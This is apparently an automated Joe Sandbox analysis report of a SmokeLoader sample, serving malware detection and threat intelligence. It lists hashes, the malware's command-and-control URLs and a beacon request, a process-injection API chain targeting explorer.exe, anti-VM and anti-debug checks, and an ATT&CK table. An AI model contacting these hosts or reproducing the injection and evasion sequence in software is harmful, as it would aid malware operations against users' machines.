Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p3jNeWT0GE.exe

Overview

General Information

Sample Name:p3jNeWT0GE.exe
Analysis ID:652394
MD5:25b54f50600604a53e80163b9049421e
SHA1:be28d831c5183368f057f8bec104a2b0babb406c
SHA256:9904784c707abb24585e3e61fa5cc094380206385cbb7d087c968d7dc5ee0991
Tags:DofoilexeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • p3jNeWT0GE.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\p3jNeWT0GE.exe" MD5: 25B54F50600604A53E80163B9049421E)
    • p3jNeWT0GE.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\p3jNeWT0GE.exe" MD5: 25B54F50600604A53E80163B9049421E)
      • explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • hdgaecu (PID: 7136 cmdline: C:\Users\user\AppData\Roaming\hdgaecu MD5: 25B54F50600604A53E80163B9049421E)
    • hdgaecu (PID: 5244 cmdline: C:\Users\user\AppData\Roaming\hdgaecu MD5: 25B54F50600604A53E80163B9049421E)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              12.2.hdgaecu.c215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                1.2.p3jNeWT0GE.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  13.2.hdgaecu.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://host-host-file8.com/URL Reputation: Label: malware
                    Source: host-file-host6.comVirustotal: Detection: 18%Perma Link
                    Source: host-host-file8.comVirustotal: Detection: 12%Perma Link
                    Source: p3jNeWT0GE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\hdgaecuJoe Sandbox ML: detected
                    Source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                    Source: p3jNeWT0GE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Binary string: C:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdb source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: Binary string: {JMC:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdbP5D source: p3jNeWT0GE.exe, hdgaecu.4.dr

                    Networking

                    barindex
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: Malware configuration extractorURLs: http://host-file-host6.com/
                    Source: Malware configuration extractorURLs: http://host-host-file8.com/
                    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcxakxdec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: host-file-host6.com
                    Source: explorer.exe, 00000004.00000000.397114425.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374277431.00000000026D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobY
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcxakxdec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: host-file-host6.com
                    Source: unknownDNS traffic detected: queries for: host-file-host6.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: p3jNeWT0GE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0041FB80
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_0040180C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401818 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401822 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401826 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401834 Sleep,NtTerminateProcess,
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\explorer.exeSection loaded: webio.dll
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                    Source: p3jNeWT0GE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@5/1
                    Source: p3jNeWT0GE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdb source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: Binary string: {JMC:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdbP5D source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C21970 push ebx; iretd
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C21977 push ebx; iretd
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C2198B push ebx; iretd
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011D0 push ebx; iretd
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011D7 push ebx; iretd
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011EB push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C21970 push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C21977 push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C2198B push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011D0 push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011D7 push ebx; iretd
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011EB push ebx; iretd
                    Source: p3jNeWT0GE.exeStatic PE information: section name: .zineha
                    Source: p3jNeWT0GE.exeStatic PE information: section name: .cixu
                    Source: hdgaecu.4.drStatic PE information: section name: .zineha
                    Source: hdgaecu.4.drStatic PE information: section name: .cixu
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0042A090 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\p3jnewt0ge.exeJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hdgaecu:Zone.Identifier read attributes | delete

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\explorer.exe TID: 6908Thread sleep count: 558 > 30
                    Source: C:\Windows\explorer.exe TID: 6996Thread sleep count: 234 > 30
                    Source: C:\Windows\explorer.exe TID: 6112Thread sleep count: 306 > 30
                    Source: C:\Windows\explorer.exe TID: 6112Thread sleep time: -30600s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 964Thread sleep count: 348 > 30
                    Source: C:\Windows\explorer.exe TID: 6924Thread sleep count: 158 > 30
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 558
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSystem information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeAPI call chain: ExitProcess graph end node
                    Source: explorer.exe, 00000004.00000000.401632230.0000000006389000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000004.00000000.398203824.0000000004150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i&
                    Source: explorer.exe, 00000004.00000000.437472725.0000000007D2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                    Source: explorer.exe, 00000004.00000000.404835251.0000000007BC5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f8b}
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00Iy
                    Source: explorer.exe, 00000004.00000000.405019671.0000000007CCB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000v

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00411CF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0042A090 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20042 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C20042 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0040F170 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00411CF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0040D690 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\explorer.exeFile created: hdgaecu.4.drJump to dropped file
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeMemory written: C:\Users\user\Desktop\p3jNeWT0GE.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\hdgaecuMemory written: C:\Users\user\AppData\Roaming\hdgaecu base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeThread created: C:\Windows\explorer.exe EIP: 2681930
                    Source: C:\Users\user\AppData\Roaming\hdgaecuThread created: unknown EIP: 47C1930
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: explorer.exe, 00000004.00000000.404889078.0000000007C08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386698402.0000000007C08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.400270401.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000004.00000000.396362385.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.373840947.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.414885493.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanPV*
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0041C570 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    512
                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Exploitation for Client Execution
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    12
                    Virtualization/Sandbox Evasion
                    LSASS Memory221
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                    Non-Application Layer Protocol
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                    Process Injection
                    Security Account Manager12
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Hidden Files and Directories
                    NTDS2
                    Process Discovery
